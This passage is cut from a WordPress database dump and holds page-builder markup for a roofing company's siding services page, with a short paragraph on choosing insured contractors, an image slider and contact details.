.block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"afa0e568-68f4-4025-b8bc-c877ecbbb129\"} -->\n<style type=\"text/css\"> .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-afa0e568-68f4-4025-b8bc-c877ecbbb129 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"6a05bb6a-276d-4790-b47d-858d6f80f6d3\"} -->\n<style type=\"text/css\"> .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a05bb6a-276d-4790-b47d-858d6f80f6d3\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"49f6ee6c-504d-4d60-938f-35ad6223261c\"} -->\n<style type=\"text/css\"> .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-49f6ee6c-504d-4d60-938f-35ad6223261c\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2f8e1399-a394-4dc5-afcc-503ec3adb6af\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2f8e1399-a394-4dc5-afcc-503ec3adb6af\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roof And siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>Few things add curb appeal better than new, clean siding. With so many siding contractors out there to choose from getting started on your project can be a little overwhelming, so let us help!<br><br>Good siding contractors will be able to help you pick the right kind of siding for your home based on budget, climate, design and more! This will make sure that you get the most out of your new or renovated siding.<br><br>Just a note: when going with a new siding contractor be sure they have adequate liability insurance. Anyone with a truck and a ladder can claim to be a siding contractor, so there are plenty of uninsured one-man operations out there. You can never be too careful for a siding installation job that will require the siding contractors to climb on your roof!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1715a7e2-d9ed-427a-be77-136e8c2c931b\"} -->\n<style type=\"text/css\"> .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1715a7e2-d9ed-427a-be77-136e8c2c931b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"efa13df2-51dc-4c44-938f-814450f36d07\"} -->\n<style type=\"text/css\"> .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-efa13df2-51dc-4c44-938f-814450f36d07\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"49885c91-6f61-4ac3-8911-3a58424dd7c7\"} -->\n<style type=\"text/css\"> .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://cteisys.com/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/248413504_4961941493820252_6022205579321516239_n.jpg\" alt=\"\" data-id=\"411\" data-link=\"https://cteisys.com/248413504_4961941493820252_6022205579321516239_n/\" class=\"wp-image-411\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" data-id=\"413\" data-link=\"https://cteisys.com/c60adea113fb2f5f80419bb170309509/\" class=\"wp-image-413\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" data-id=\"414\" data-link=\"https://cteisys.com/dsc03903-1/\" class=\"wp-image-414\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form <a href=\"https://cteisys.com/contact-layout-1/\">here.</a> We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Siding','','inherit','closed','closed','','215-revision-v1','','','2022-08-23 18:50:34','2022-08-23 18:50:34','',215,'https://cteisys.com/?p=456',0,'revision','',0),(433,1,'2022-08-23 18:33:01','2022-08-23 18:33:01','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30125cb2-5b1a-4355-96e3-c2a9ea89f965\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"afa0e568-68f4-4025-b8bc-c877ecbbb129\"} -->\n<style type=\"text/css\"> .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-afa0e568-68f4-4025-b8bc-c877ecbbb129 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"6a05bb6a-276d-4790-b47d-858d6f80f6d3\"} -->\n<style type=\"text/css\"> .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a05bb6a-276d-4790-b47d-858d6f80f6d3\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"49f6ee6c-504d-4d60-938f-35ad6223261c\"} -->\n<style type=\"text/css\"> .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-49f6ee6c-504d-4d60-938f-35ad6223261c\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading 